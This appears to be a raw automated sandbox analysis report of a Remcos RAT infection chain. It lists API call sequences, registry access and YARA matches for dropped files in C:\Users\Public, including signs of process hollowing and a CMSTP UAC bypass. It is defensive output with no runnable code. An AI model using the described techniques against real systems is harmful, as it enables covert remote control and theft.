Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore, 25_2_00007FF67DEE60BC

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0C9E2 SystemParametersInfoW, 28_2_1BA0C9E2
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107C9E2 SystemParametersInfoW, 36_2_2107C9E2
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree, 25_2_00007FF67DE5F9B8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357, 25_2_00007FF67DE6FC20
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext, 25_2_00007FF67DF098B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree, 25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DF093A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED342C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357, 25_2_00007FF67DED0EF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360, 25_2_00007FF67DF06EA8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext, 25_2_00007FF67DEC0F58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash, 25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey, 25_2_00007FF67DE929A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DF0A740
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey, 25_2_00007FF67DE925E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject, 25_2_00007FF67DECE1F8

System Summary

Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\Public\Libraries\sppsvc.pif Process Stats: CPU usage > 49%
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken, 4_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 4_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD898C NtQueryInformationToken, 4_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 4_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 4_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 4_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 4_2_00007FF789BD88C0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 4_2_00007FF789BD7FF8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken, 6_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 6_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD898C NtQueryInformationToken, 6_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 6_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 6_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 6_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 6_2_00007FF789BD88C0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 6_2_00007FF789BD7FF8
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655889890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey, 14_2_00007FF655889890
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF2C964 NtQuerySystemTime,RtlTimeToSecondsSince1970, 25_2_00007FF67DF2C964
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028AC2D8 NtCreateFile,NtWriteFile, 28_2_028AC2D8
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028AC3BC NtOpenFile,NtReadFile,NtClose, 28_2_028AC3BC
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A78E0 NtAllocateVirtualMemory, 28_2_028A78E0
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028AC2D6 NtCreateFile,NtWriteFile, 28_2_028AC2D6
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A78DE NtAllocateVirtualMemory, 28_2_028A78DE
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0BB35 OpenProcess,NtResumeProcess,CloseHandle, 28_2_1BA0BB35
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0BB09 OpenProcess,NtSuspendProcess,CloseHandle, 28_2_1BA0BB09
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA032D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile, 28_2_1BA032D2
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 28_2_1BA0D58F
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 29_2_00007FF789BD8114
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError, 29_2_00007FF789BD7FF8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD89E4 NtQueryInformationToken,NtQueryInformationToken, 29_2_00007FF789BD89E4
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 29_2_00007FF789BC3D94
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD898C NtQueryInformationToken, 29_2_00007FF789BD898C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BF1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 29_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BEBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 29_2_00007FF789BEBCF0
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 29_2_00007FF789BD88C0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029BC3BC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 36_2_029BC3BC
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029B78E0 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 36_2_029B78E0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029BC2D8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 36_2_029BC2D8
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029BC2D6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 36_2_029BC2D6
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029B7A38 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 36_2_029B7A38
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029B78DE GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 36_2_029B78DE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029B7EBE CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, 36_2_029B7EBE
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029B7EC0 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, 36_2_029B7EC0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210732D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 36_2_210732D2
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107BB09 OpenProcess,NtSuspendProcess,CloseHandle, 36_2_2107BB09
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107BB35 OpenProcess,NtResumeProcess,CloseHandle, 36_2_2107BB35
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 4_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList, 4_2_00007FF789BD4224
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA067B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 28_2_1BA067B9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 36_2_210767B4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD0A6C 4_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD4224 4_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BCAA54 4_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD5554 4_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD37D8 4_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC6EE4 4_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BE7F00 4_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BCE680 4_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEEE88 4_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC2220 4_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC4A30 4_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEAA30 4_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC5240 4_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC7650 4_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BCD250 4_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC9E50 4_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC8DF8 4_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BCCE10 4_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC81D4 4_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BED9D0 4_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC7D30 4_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BF1538 4_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BCB0D8 4_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC8510 4_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD18D4 4_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC1884 4_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD7854 4_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC2C48 4_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEAC4C 4_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC6BE0 4_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC3410 4_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BEAFBC 4_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC5B70 4_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC3F90 4_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC372C 4_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC9B50 4_2_00007FF789BC9B50
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD0A6C 6_2_00007FF789BD0A6C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD4224 6_2_00007FF789BD4224
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BCAA54 6_2_00007FF789BCAA54
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD5554 6_2_00007FF789BD5554
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD37D8 6_2_00007FF789BD37D8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC6EE4 6_2_00007FF789BC6EE4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BE7F00 6_2_00007FF789BE7F00
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BCE680 6_2_00007FF789BCE680
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BEEE88 6_2_00007FF789BEEE88
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC2220 6_2_00007FF789BC2220
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC4A30 6_2_00007FF789BC4A30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BEAA30 6_2_00007FF789BEAA30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC5240 6_2_00007FF789BC5240
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC7650 6_2_00007FF789BC7650
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BCD250 6_2_00007FF789BCD250
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC9E50 6_2_00007FF789BC9E50
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC8DF8 6_2_00007FF789BC8DF8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BCCE10 6_2_00007FF789BCCE10
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC81D4 6_2_00007FF789BC81D4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BED9D0 6_2_00007FF789BED9D0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC7D30 6_2_00007FF789BC7D30
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BF1538 6_2_00007FF789BF1538
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BCB0D8 6_2_00007FF789BCB0D8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC8510 6_2_00007FF789BC8510
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD18D4 6_2_00007FF789BD18D4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC1884 6_2_00007FF789BC1884
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD7854 6_2_00007FF789BD7854
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC2C48 6_2_00007FF789BC2C48
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BEAC4C 6_2_00007FF789BEAC4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC6BE0 6_2_00007FF789BC6BE0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC3410 6_2_00007FF789BC3410
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BEAFBC 6_2_00007FF789BEAFBC
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC5B70 6_2_00007FF789BC5B70
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC3F90 6_2_00007FF789BC3F90
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC372C 6_2_00007FF789BC372C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC9B50 6_2_00007FF789BC9B50
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655886054 14_2_00007FF655886054
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF65588596C 14_2_00007FF65588596C
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655881664 14_2_00007FF655881664
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655886EC8 14_2_00007FF655886EC8
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF6558872C0 14_2_00007FF6558872C0
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655886AE8 14_2_00007FF655886AE8
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF6558883D8 14_2_00007FF6558883D8
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655885128 14_2_00007FF655885128
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655884318 14_2_00007FF655884318
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655884050 14_2_00007FF655884050
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655889C74 14_2_00007FF655889C74
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655887670 14_2_00007FF655887670
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655882D70 14_2_00007FF655882D70
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655889890 14_2_00007FF655889890
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF655887C7C 14_2_00007FF655887C7C
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF6558867A0 14_2_00007FF6558867A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1C120 25_2_00007FF67DF1C120
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1BC10 25_2_00007FF67DF1BC10
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF43800 25_2_00007FF67DF43800
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1F020 25_2_00007FF67DF1F020
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE42F38 25_2_00007FF67DE42F38
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1CCB8 25_2_00007FF67DF1CCB8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC5F04 25_2_00007FF67DEC5F04
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB9EE4 25_2_00007FF67DEB9EE4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE81ED0 25_2_00007FF67DE81ED0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBDEB0 25_2_00007FF67DEBDEB0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE8DEA4 25_2_00007FF67DE8DEA4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBBE70 25_2_00007FF67DEBBE70
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC1E2C 25_2_00007FF67DEC1E2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE65DF7 25_2_00007FF67DE65DF7
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE41DE8 25_2_00007FF67DE41DE8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECBDA0 25_2_00007FF67DECBDA0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE91D70 25_2_00007FF67DE91D70
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE7D70 25_2_00007FF67DEE7D70
